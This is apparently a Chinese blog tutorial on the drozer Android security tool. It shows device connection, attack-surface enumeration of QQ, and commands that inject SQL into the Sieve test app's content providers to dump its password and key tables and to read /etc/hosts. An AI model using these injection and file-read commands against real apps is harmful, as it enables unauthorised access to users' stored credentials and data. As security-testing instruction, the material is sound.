Android逆向分析之drozer使用

设备的连接

在手机上打开drozer并讲监听端口打开

在cmd或者是power shell输入 adb forward tcp:31415 tcp:31415

 adb forward tcp:31415 tcp:31415

在Ubuntu中输入 drozer console connect 并出现如下界面表示连接成功

 drozer console connect
Could not find java. Please ensure that it is installed and on your PATH.

If this error persists, specify the path in the ~/.drozer_config file:

    [executables]
    java = /path/to/java
Selecting 1456623556565 (oppo 15 Plus 7.1.2)

            ..                    ..:.
           ..o..                  .r..
            ..a..  . ....... .  ..nd
              ro..idsnemesisand..pr
              .otectorandroidsneme.
           .,sisandprotectorandroids+.
         ..nemesisandprotectorandroidsn:.
        .emesisandprotectorandroidsnemes..
      ..isandp,..,rotectorandro,..,idsnem.
      .isisandp..rotectorandroid..snemisis.
      ,andprotectorandroidsnemisisandprotec.
     .torandroidsnemesisandprotectorandroid.
     .snemisisandprotectorandroidsnemesisan:
     .dprotectorandroidsnemesisandprotector.

drozer Console (v2.4.4)

连接后的使用

查看软件对应的包名:在Ubuntu中输入 run app.package.list -f 【软件名称】

dz> run app.package.list -f QQ
com.tencent.mobileqq (QQ)
dz>

查看APK的详细信息:run app.package.list -a +包名

查看攻击面:

dz> run app.package.attacksurface com.tencent.mobileqq
Attack Surface:
  13 activities exported
  1 broadcast receivers exported
  1 content providers exported
  3 services exported
dz>

查看具体攻击面:run app.activity.info –a 包名

使用drozer加载acticity:  run app.activity.start --component  +apk包名  + activity

查看contentprovider不需要任何特定的权限就可以交互: run app.provider.info -a +包名

猜测可以使用的目录URL: run scanner.provider.finduris -a +路径

使用projection参数和seleciton参数传递简单的sql注入语句到contentprovider
检测语句:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"

run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"

列数据库中所有表
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
列表内容
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"

猜测目录url并使用app.provider.read模块查看某个文件
run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts

检查是否有SQL注入
run scanner.provider.injection -a +包名

检查是否存在文件遍历
run scanner.provider.traversal -a +包名
 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值